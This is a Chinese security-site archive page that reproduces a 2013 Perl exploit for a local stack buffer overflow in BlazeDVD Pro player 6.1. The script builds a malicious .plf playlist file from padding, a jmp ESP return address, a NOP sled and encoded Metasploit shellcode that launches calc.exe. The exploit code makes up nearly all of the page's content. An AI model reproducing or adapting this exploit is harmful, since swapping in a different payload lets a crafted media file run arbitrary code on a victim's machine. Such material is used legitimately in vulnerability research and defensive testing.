首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)
来源:luiguibiker@gmail.com 作者:PuN1sh3r 发布时间:2013-07-18  
#!/usr/bin/perl
  
# BlazeDVD Pro player 6.1  Local stack based buffer overflow
# Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials
  
  
$file = "blazeExpl.plf";
$junk = "\x41" x 260;
$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll
  
#msf win/exec calc.exe [*] x86/alpha_mixed 
$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x49\x6c\x78\x68\x4d\x59\x67\x70\x77\x70" .
"\x43\x30\x65\x30\x6b\x39\x5a\x45\x76\x51\x59\x42\x52\x44" .
"\x6e\x6b\x71\x42\x46\x50\x6e\x6b\x56\x32\x36\x6c\x4e\x6b" .
"\x53\x62\x66\x74\x6c\x4b\x33\x42\x36\x48\x34\x4f\x6f\x47" .
"\x51\x5a\x75\x76\x75\x61\x39\x6f\x45\x61\x79\x50\x6c\x6c" .
"\x67\x4c\x70\x61\x53\x4c\x66\x62\x36\x4c\x57\x50\x5a\x61" .
"\x7a\x6f\x46\x6d\x63\x31\x5a\x67\x4a\x42\x4a\x50\x72\x72" .
"\x33\x67\x6c\x4b\x76\x32\x76\x70\x6c\x4b\x53\x72\x35\x6c" .
"\x46\x61\x4a\x70\x6e\x6b\x31\x50\x50\x78\x6b\x35\x39\x50" .
"\x54\x34\x62\x6a\x67\x71\x4e\x30\x30\x50\x6c\x4b\x52\x68" .
"\x35\x48\x6e\x6b\x70\x58\x51\x30\x43\x31\x6a\x73\x5a\x43" .
"\x55\x6c\x43\x79\x6c\x4b\x37\x44\x4c\x4b\x37\x71\x69\x46" .
"\x36\x51\x39\x6f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x5a\x6f" .
"\x64\x4d\x37\x71\x5a\x67\x46\x58\x79\x70\x43\x45\x4b\x44" .
"\x77\x73\x31\x6d\x4b\x48\x47\x4b\x51\x6d\x46\x44\x50\x75" .
"\x39\x72\x30\x58\x6c\x4b\x53\x68\x75\x74\x35\x51\x59\x43" .
"\x65\x36\x6c\x4b\x36\x6c\x52\x6b\x6e\x6b\x42\x78\x47\x6c" .
"\x63\x31\x48\x53\x6e\x6b\x63\x34\x4e\x6b\x56\x61\x7a\x70" .
"\x6c\x49\x73\x74\x34\x64\x56\x44\x63\x6b\x53\x6b\x43\x51" .
"\x61\x49\x43\x6a\x66\x31\x4b\x4f\x4b\x50\x31\x48\x71\x4f" .
"\x33\x6a\x6c\x4b\x32\x32\x48\x6b\x6e\x66\x31\x4d\x51\x7a" .
"\x76\x61\x6c\x4d\x6e\x65\x4f\x49\x37\x70\x67\x70\x63\x30" .
"\x72\x70\x70\x68\x44\x71\x4e\x6b\x32\x4f\x6b\x37\x39\x6f" .
"\x38\x55\x4f\x4b\x7a\x50\x6d\x65\x6c\x62\x70\x56\x55\x38" .
"\x6f\x56\x4d\x45\x6d\x6d\x6f\x6d\x39\x6f\x4b\x65\x55\x6c" .
"\x74\x46\x63\x4c\x55\x5a\x6d\x50\x49\x6b\x6b\x50\x64\x35" .
"\x67\x75\x6f\x4b\x72\x67\x57\x63\x71\x62\x62\x4f\x30\x6a" .
"\x57\x70\x36\x33\x69\x6f\x68\x55\x73\x53\x61\x71\x72\x4c" .
"\x30\x63\x44\x6e\x70\x65\x32\x58\x32\x45\x65\x50\x41\x41";
$junk .= $eip . "\x90" x 50 . $shellcode ;
###############################################################
open(FILE,">$file");
print FILE $junk;
close(FILE);
###############################################################

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Eglibc PTR MANGLE Bug
·Microsoft Office PowerPoint 20
·Kate's Video Toolkit Version 7
·Light Audio Mixer Version 1.0.
·Symantec Workspace Virtualizat
·rpcbind (CALLIT Procedure) UDP
·Windows Movie Maker Version 2.
·Squid-3.3.5 DoS PoC
·HP Managed Printing Administra
·MediaCoder 0.8.23.5530 SEH Buf
·Apple Quicktime 7 Invalid Atom
·MediaCoder .M3U Buffer Overflo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved